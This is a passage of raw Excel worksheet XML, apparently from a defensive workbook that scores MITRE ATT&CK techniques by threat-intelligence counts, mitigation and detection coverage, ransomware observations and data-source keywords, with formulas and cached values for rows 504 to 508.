      <c r="D504" s="25" t="s">
        <v>1721</v>
      </c>
      <c r="E504" s="25" t="s">
        <v>1810</v>
      </c>
      <c r="F504" s="51">
        <v>1</v>
      </c>
      <c r="G504" s="51">
        <v>1</v>
      </c>
      <c r="H504" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I504">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J504">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K504">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L504">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M504" s="25">
        <v>0</v>
      </c>
      <c r="N504" s="51">
        <v>0</v>
      </c>
      <c r="O504" s="51">
        <v>0</v>
      </c>
      <c r="P504" s="51">
        <v>0</v>
      </c>
      <c r="Q504" s="51">
        <v>0</v>
      </c>
      <c r="R504" s="51"/>
      <c r="S504" s="51">
        <v>0</v>
      </c>
      <c r="T504" s="51"/>
      <c r="U504" s="51">
        <v>0</v>
      </c>
      <c r="V504" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W504">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X504">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y504">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z504">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA504">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB504">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC504" s="29" t="s">
        <v>513</v>
      </c>
      <c r="AD504" s="25" t="str" cm="1">
        <f t="array" ref="AD504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE504" s="25">
        <f>IF(AD504="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF504" s="25" t="str" cm="1">
        <f t="array" ref="AF504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG504" s="25">
        <f>IF(AF504="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH504" s="25" t="str" cm="1">
        <f t="array" ref="AH504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI504" s="25">
        <f>IF(AH504="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ504" s="25" t="str" cm="1">
        <f t="array" ref="AJ504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC504)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK504" s="25">
        <f>IF(AJ504="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL504" s="25" t="str" cm="1">
        <f t="array" ref="AL504">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC504)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM504" s="25">
        <f>IF(AL504="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN504" s="52">
        <v>0</v>
      </c>
      <c r="AO504" s="51">
        <v>0</v>
      </c>
      <c r="AP504" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ504" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR504" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS504" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT504" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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05" spans="1:47" ht="32.1">
      <c r="A505" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B505" s="25">
        <f>SUM(H505,M505,V505)*(1+SUM(AE505,AG505,AI505,AK505,AM505))</f>
        <v>0.1</v>
      </c>
      <c r="C505" s="25" t="s">
        <v>1811</v>
      </c>
      <c r="D505" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E505" s="25" t="s">
        <v>1812</v>
      </c>
      <c r="F505" s="51">
        <v>1</v>
      </c>
      <c r="G505" s="51">
        <v>1</v>
      </c>
      <c r="H505" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I505">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J505">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K505">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L505">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M505" s="25">
        <v>0</v>
      </c>
      <c r="N505" s="51">
        <v>0</v>
      </c>
      <c r="O505" s="51">
        <v>0</v>
      </c>
      <c r="P505" s="51">
        <v>0</v>
      </c>
      <c r="Q505" s="51">
        <v>0</v>
      </c>
      <c r="R505" s="51"/>
      <c r="S505" s="51">
        <v>0</v>
      </c>
      <c r="T505" s="51"/>
      <c r="U505" s="51">
        <v>0</v>
      </c>
      <c r="V505" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W505">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X505">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y505">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z505">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA505">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB505">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC505" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD505" s="25" t="str" cm="1">
        <f t="array" ref="AD505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE505" s="25">
        <f>IF(AD505="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF505" s="25" t="str" cm="1">
        <f t="array" ref="AF505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC505)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG505" s="25">
        <f>IF(AF505="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH505" s="25" t="str" cm="1">
        <f t="array" ref="AH505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI505" s="25">
        <f>IF(AH505="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ505" s="25" t="str" cm="1">
        <f t="array" ref="AJ505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK505" s="25">
        <f>IF(AJ505="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL505" s="25" t="str" cm="1">
        <f t="array" ref="AL505">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC505)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM505" s="25">
        <f>IF(AL505="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN505" s="63"/>
      <c r="AO505" s="51">
        <v>0</v>
      </c>
      <c r="AP505" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ505" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR505" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS505" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT505" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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06" spans="1:47" ht="48">
      <c r="A506" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B506" s="25">
        <f>SUM(H506,M506,V506)*(1+SUM(AE506,AG506,AI506,AK506,AM506))</f>
        <v>0.1198</v>
      </c>
      <c r="C506" s="25" t="s">
        <v>1813</v>
      </c>
      <c r="D506" s="25" t="s">
        <v>1814</v>
      </c>
      <c r="E506" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F506" s="51">
        <v>1</v>
      </c>
      <c r="G506" s="51">
        <v>1</v>
      </c>
      <c r="H506" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I506">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J506">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K506">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L506">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M506" s="25">
        <v>0</v>
      </c>
      <c r="N506" s="51">
        <v>0</v>
      </c>
      <c r="O506" s="51">
        <v>0</v>
      </c>
      <c r="P506" s="51">
        <v>0</v>
      </c>
      <c r="Q506" s="51">
        <v>0</v>
      </c>
      <c r="R506" s="51"/>
      <c r="S506" s="51">
        <v>0</v>
      </c>
      <c r="T506" s="51"/>
      <c r="U506" s="51">
        <v>0</v>
      </c>
      <c r="V506" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W506">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X506">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y506">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z506">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA506">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB506">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC506" s="29" t="s">
        <v>1815</v>
      </c>
      <c r="AD506" s="25" t="str" cm="1">
        <f t="array" ref="AD506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC506)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE506" s="25">
        <f>IF(AD506="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF506" s="25" t="str" cm="1">
        <f t="array" ref="AF506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC506)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG506" s="25">
        <f>IF(AF506="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH506" s="25" t="str" cm="1">
        <f t="array" ref="AH506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI506" s="25">
        <f>IF(AH506="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ506" s="25" t="str" cm="1">
        <f t="array" ref="AJ506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK506" s="25">
        <f>IF(AJ506="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL506" s="25" t="str" cm="1">
        <f t="array" ref="AL506">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC506)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM506" s="25">
        <f>IF(AL506="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN506" s="51"/>
      <c r="AO506" s="51"/>
      <c r="AP506" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="AQ506" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AR506" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.9933333333333335E-2</v>
      </c>
      <c r="AS506" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT506" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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07" spans="1:47" ht="48">
      <c r="A507" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="B507" s="25">
        <f>SUM(H507,M507,V507)*(1+SUM(AE507,AG507,AI507,AK507,AM507))</f>
        <v>0.1</v>
      </c>
      <c r="C507" s="25" t="s">
        <v>1816</v>
      </c>
      <c r="D507" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E507" s="25" t="s">
        <v>1817</v>
      </c>
      <c r="F507" s="51">
        <v>1</v>
      </c>
      <c r="G507" s="51">
        <v>1</v>
      </c>
      <c r="H507" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I507">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J507">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K507">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L507">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M507" s="25">
        <v>0</v>
      </c>
      <c r="N507" s="51">
        <v>0</v>
      </c>
      <c r="O507" s="51">
        <v>0</v>
      </c>
      <c r="P507" s="51">
        <v>0</v>
      </c>
      <c r="Q507" s="51">
        <v>0</v>
      </c>
      <c r="R507" s="51"/>
      <c r="S507" s="51">
        <v>0</v>
      </c>
      <c r="T507" s="52" t="s">
        <v>1818</v>
      </c>
      <c r="U507" s="51">
        <v>0</v>
      </c>
      <c r="V507" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W507">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X507">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y507">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z507">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA507">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB507">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC507" s="29" t="s">
        <v>141</v>
      </c>
      <c r="AD507" s="25" t="str" cm="1">
        <f t="array" ref="AD507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE507" s="25">
        <f>IF(AD507="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF507" s="25" t="str" cm="1">
        <f t="array" ref="AF507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC507)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG507" s="25">
        <f>IF(AF507="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH507" s="25" t="str" cm="1">
        <f t="array" ref="AH507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI507" s="25">
        <f>IF(AH507="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ507" s="25" t="str" cm="1">
        <f t="array" ref="AJ507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK507" s="25">
        <f>IF(AJ507="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL507" s="25" t="str" cm="1">
        <f t="array" ref="AL507">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC507)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM507" s="25">
        <f>IF(AL507="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN507" s="51"/>
      <c r="AO507" s="51"/>
      <c r="AP507" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.01</v>
      </c>
      <c r="AQ507" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AR507" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="AS507" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT507" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU50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08" spans="1:47">
      <c r="A508" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1979999999999999E-2</v>
      </c>
      <c r="B508" s="25">
        <f>SUM(H508,M508,V508)*(1+SUM(AE508,AG508,AI508,AK508,AM508))</f>
        <v>0.1198</v>
      </c>
      <c r="C508" s="25" t="s">
        <v>1819</v>
      </c>
      <c r="D508" s="25" t="s">
        <v>306</v>
      </c>
      <c r="E508" s="25" t="s">
        <v>1820</v>
      </c>
      <c r="F508" s="51">
        <v>1</v>
      </c>
      <c r="G508" s="51">
        <v>1</v>
      </c>
      <c r="H508" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I508">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J508">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K508">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L508">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M508" s="25">
        <v>0</v>
      </c>
      <c r="N508" s="51">
        <v>0</v>
      </c>
      <c r="O508" s="51">
        <v>0</v>
      </c>
      <c r="P508" s="51">
        <v>0</v>
      </c>
      <c r="Q508" s="51">
        <v>0</v>
      </c>
      <c r="R508" s="51"/>
      <c r="S508" s="51">
        <v>0</v>
      </c>
      <c r="T508" s="51"/>
      <c r="U508" s="51">
        <v>0</v>
      </c>
      <c r="V508" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W508">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X508">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y508">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z508">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA508">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB508">
